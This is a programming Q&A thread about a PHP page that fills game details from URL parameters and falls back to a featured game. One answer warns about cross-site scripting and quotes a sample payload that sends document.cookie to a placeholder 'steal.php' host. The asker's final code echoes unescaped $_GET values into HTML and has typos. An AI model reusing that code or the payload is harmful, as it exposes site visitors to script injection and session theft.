PHP: Set Varible to Get Value

Question

I am creating a game web site using PHP and I want to just use one page for the game rather than have a bunch. I want to have the info entered like this:

`?swf=[path to .swf]&name=[name of game]&description=[Description of Game]&instruction=[Instructions for game]``

The problem is that if there is no data entered in the URL it returns a black page. I want to use the if...else to display a featured game if nothing is in the URL. The code I have right now is:

<?php $name=$_GET["name"];
if ($name=="*")
echo "<h3>$name"</h3>;
else
echo "Featured Game Name";
?>

<?php $description=$_GET["description"];
if ($description=="*")
echo "<h5>$description</h3>;
else
echo "<h5>Featured Game Description</h5>";
?>

<object type="application/x-shockwave-flash" data="
<?php $swf=$_GET["swf"];
if ($swf=="*")
echo "$swf;
else
echo "Featured Game swf path";
?>
" width="700" height="400">
<param name="movie" value="
<?php $swf=$_GET["swf"];
if ($swf=="*")
echo "$swf;
else
echo "Featured Game swf path";
?>
" />
</object>

<?php $instruction=$_GET["instruction"];
if ($instruction=="*")
echo "<p>$instruction</p>;
else
echo "Featured Game Instruction";
?>

Can anyone offer any suggestions on ways to accomplish this?

Answer 1

I'm not sure what the if ($name=="*") does, but I would use

if(isset($_GET['name']))

instead, to check if the name was passed to the url.

Answer 2

if(empty($_GET['swf']) and empty($_GET['name']) and empty($_GET['description']) and empty($_GET['instruction']){
/// code here
}else{
/// and here
}

Answer 3

I assume with $_GET['name'] == "*" you are mixing up something. In that context it is just a string comparison. * is not a wildcard that matches anything like in SQL. If you want to check if there is something in $_GET['name'], you could use empty or isset.

In addition, I suggest you just check for name, because all your params conceptually belong to game. If there is no name, there will be no description and no instructions.

But whatever you do, be sure to sanitize the params you are going to output, otherwise someone will supply this or something similar for name sooner or later:

<script>document.location='http://www.example.com/steal.php?'+document.cookie&lt;/script&gt;

Answer 4

I have updated my code and it is working properly.

My new code is:

<?php
$featured_name=name;
$featured_description=description;
$featured_swf=swf;
$featured_instructions=instructions;
?>
      <h3>

       <?php

        if(isset($_GET['name']))

         echo $_GET["name"]; 

        else

         echo $featured_name;

       ?> 

      </h3>

      <h5>

       <?php

        if(isset($_GET['description']))

         echo $_GET["description"]; 

        else

         echo $featured_description;

       ?> 

      </h5>

      <object type="application/x-shockwave-flash"

      data="

       <?php

        if(isset($_GET['swf']))

         echo $_GET["swf"]; 

        else

         echo $featured_swf;

       ?> 

      " 

      width="700" height="400">

      <param name="movie" 

      value="

       <?php

        if(isset($_GET['swf']))

         echo $_GET["swf"]; 

        else

         echo $featured_swf;

       ?> 

       " />

      </object>

      <p>

       <?php

        if(isset($_GET['inscructions']))

         echo $_GET["inscructions"]; 

        else

         echo $featured_instructions;

       ?> 

      </p>

I have another question: how can I define a variable that has a space in it. I would like to do this since my partner (who creates most of the games) doesn't know much about PHP or HTML and and defining variables at the top of the document would make it easier for him.